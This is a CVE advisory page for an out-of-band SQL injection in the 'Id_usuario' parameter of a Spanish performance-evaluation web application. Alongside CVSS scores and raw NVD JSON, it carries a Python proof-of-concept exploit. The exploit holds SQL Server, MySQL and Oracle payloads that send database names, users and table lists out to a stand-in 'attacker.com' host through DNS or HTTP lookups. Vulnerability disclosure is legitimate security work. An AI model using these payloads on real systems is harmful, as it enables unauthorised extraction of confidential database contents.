Security Vulnerability Report
CVE-2026-1475 CVSS 7.5 HIGH

CVE-2026-1475

Published: 2026-01-27 17:16:11
Last Modified: 2026-02-10 20:20:36

Description

An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in '/evaluacion_acciones_evalua.aspx' could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:* - VULNERABLE
Performance Evaluation (EDD) - all unpatched versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-1475 OOB SQL Injection PoC
# Target: Performance Evaluation (EDD) application
# Endpoint: /evaluacion_acciones_evalua.aspx
# Vulnerable Parameter: Id_usuario

import requests
import sys

# Target configuration
TARGET_URL = "http://target.com/evaluacion_acciones_evalua.aspx"
ATTACKER_SERVER = "attacker.com"


def exploit_sql_injection(user_id):
    """Exploit OOB SQL injection via Id_usuario parameter"""
    # Payload for SQL Server OOB extraction (example for SQL Server)
    # This payload attempts to trigger a DNS lookup to attacker server
    payload_template = f"""
    '; DECLARE @host VARCHAR(8000); SET @host = (SELECT TOP 1 DB_NAME()) + '.{ATTACKER_SERVER}'; EXEC('master..xp_dirtree ''\\' + @host + '\c$\''); --
    """

    # Alternative payload for MySQL
    mysql_payload = f"""
    ' AND (SELECT LOAD_FILE(CONCAT('\\\\\\\\', (SELECT database()), '.{ATTACKER_SERVER}\\\\test'))) --
    """

    # Alternative payload for Oracle
    oracle_payload = f"""
    ' AND (SELECT UTL_HTTP.REQUEST('http://{ATTACKER_SERVER}/' || (SELECT user FROM dual)) FROM dual) IS NOT NULL --
    """

    data = {
        'Id_usuario': user_id  # Original parameter value
    }

    # Test with malicious payload
    malicious_data = {
        'Id_usuario': payload_template.strip()
    }

    try:
        print(f"[*] Sending malicious request to {TARGET_URL}")
        print(f"[*] Payload: {payload_template[:100]}...")
        response = requests.post(
            TARGET_URL,
            data=malicious_data,
            timeout=30,
            allow_redirects=False
        )
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Check DNS logs on {ATTACKER_SERVER}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")


def extract_data_via_oob(data_to_extract):
    """Extract data using OOB technique"""
    # SQL Server example - extract table names
    payload = f"""
    '; DECLARE @s VARCHAR(8000); SELECT @s = @s + '|' + name FROM sys.tables; EXEC('master..xp_dirtree ''\\' + @s + '.{ATTACKER_SERVER}\''); --
    """
    return payload


if __name__ == "__main__":
    print("CVE-2026-1475 OOB SQL Injection Tester")
    print("=" * 50)
    # Test basic injection
    exploit_sql_injection("1")
```

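References

https://www.incibe.es/en/incibe-cert/notices/aviso/out-band-sql-injection-quatuor-performance-evaluation (Third Party Advisory)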

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1475", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:10.840", "lastModified": "2026-02-10T20:20:35.903", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter ‘Id_usuario' in ‘/evaluacion_acciones_evalua.aspx’, could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information."}, {"lang": "es", "value": "Una vulnerabilidad de inyección SQL fuera de banda (OOB SQLi) ha sido detectada en la aplicación de Evaluación del Desempeño (EDD) desarrollada por Gabinete Técnico de Programación. Explotar esta vulnerabilidad en el parámetro 'Id_usuario' en '/evaluacion_acciones_evalua.aspx', podría permitir a un atacante extraer información sensible de la base de datos a través de canales externos, sin que la aplicación afectada devuelva los datos directamente, comprometiendo la confidencialidad de la información almacenada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": 
"NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:*", "matchCriteriaId": "66ECBB1A-4822-4186-9C8B-49740C8B52A4"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/out-band-sql-injection-quatuor-performance-evaluation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}